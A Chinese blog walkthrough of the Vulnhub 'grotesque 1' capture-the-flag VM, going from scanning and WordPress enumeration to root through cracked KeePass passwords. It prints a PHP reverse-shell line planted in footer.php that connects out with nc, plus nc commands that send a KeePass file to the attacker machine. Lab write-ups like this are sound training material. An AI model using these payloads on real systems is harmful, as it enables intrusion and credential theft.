靶场实战 Vulnhub

grotesque 1

grotesque 1

Posted by Kyon-H on July 16, 2025

1. 环境搭建

Vuluhub靶场IP问题 - Kyon-H Blog

2. 信息搜集

搜索IP,发现主机 192.168.163.134

image.png

扫描端口发现66和80两个http端口

1

namp -T4 -A -p- 192.168.163.134

image.png

扫描目录,发现80端口无内容,扫描66端口

1

dirsearch -u http://192.168.163.134:66/

image.png

访问changelog.txt确定vvmlist版本为 16.01.2021

image.png

whatweb扫描网站

image.png

主页发现链接可以下载项目压缩包: http://192.168.163.134:66/vvmlist.zip

解压后打开

发现sshpasswd.png图片获取疑似用户名:mossad

网站主页发现特殊字符串,分析是Brainfuck代码

image.png

解码得到 /sshpasswd.png

查看项目文件,在 sense.md 文件找到提示

image.png

访问/lyricsblog 发现wordpress站点,F12发现提示,访问到图片

image.png

image.png

扫描目录

1

dirsearch -u http://192.168.163.134/lyricsblog/ -e* -i 200

image.png

发现后台登录地址 /lyricsblog/wp-login.php

2.1. 获取用户名密码

wpscan扫描用户名,获取到 erdalkomurcu

1
2
3

wpscan --url http://192.168.163.134/lyricsblog/ -e u
# 保存
echo "erdalkomurcu" > user.txt

浏览站点发现与图片中文字相同的文章

image.png

将文章内容保存到 lyrics.txt 计算其MD5值

image.png

转换为大写字符

1
2

echo "bc78c6ab38e114d6135409e44f7cdda2" | tr 'a-z' 'A-Z'
# BC78C6AB38E114D6135409E44F7CDDA2

使用用户名:erdalkomurcu,密码:BC78C6AB38E114D6135409E44F7CDDA2 登陆成功

3. 反弹shell

浏览页面找到可以注入PHP代码的位置

image.png

在footer.php添加反弹shell代码

1

system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.163.132 4444 >/tmp/f');

image.png

kali执行 nc -lvp 4444 开启监听,并反弹成功

发现raphael用户目录下user.txt但无权查看

查找网站配置文件,发现数据库配置

image.png

获得用户名:raphael,密码:_double_trouble_

尝试切换用户,成功

image.png

查看 user.txt文件,发现内容

image.png

4. root提权

查看隐藏文件,发现 .chadroot.kdbx文件

image.png

.kdbx为密码管理软件 KeePass生成的密码文件后缀名

传输到kali进行解密

1
2
3
4
5
6
7

# dc-9
nc 192.168.163.132 5555 < .chadroot.kdbx
# kali
nc -lvp 5555 >keepass
# 解密
keepass2john keepass | tee pass.txt
john pass.txt

image.png

image.png

解密得到 chatter

打开网站KeeWeb上传 keepass文件,输入密码 chatter,得到4组root密码

image.png

1
2
3
4

.:.yarak.:.
secretservice
.:.subjective.:.
rockyou.txt

使用 .:.subjective.:. 登录成功

image.png

5. 获取flag

image.png

CATALOG
    FEATURED TAGS
    DVWA 靶场实战 Vulnhub DC系列 服务器 CTFHub Ubuntu 内网防护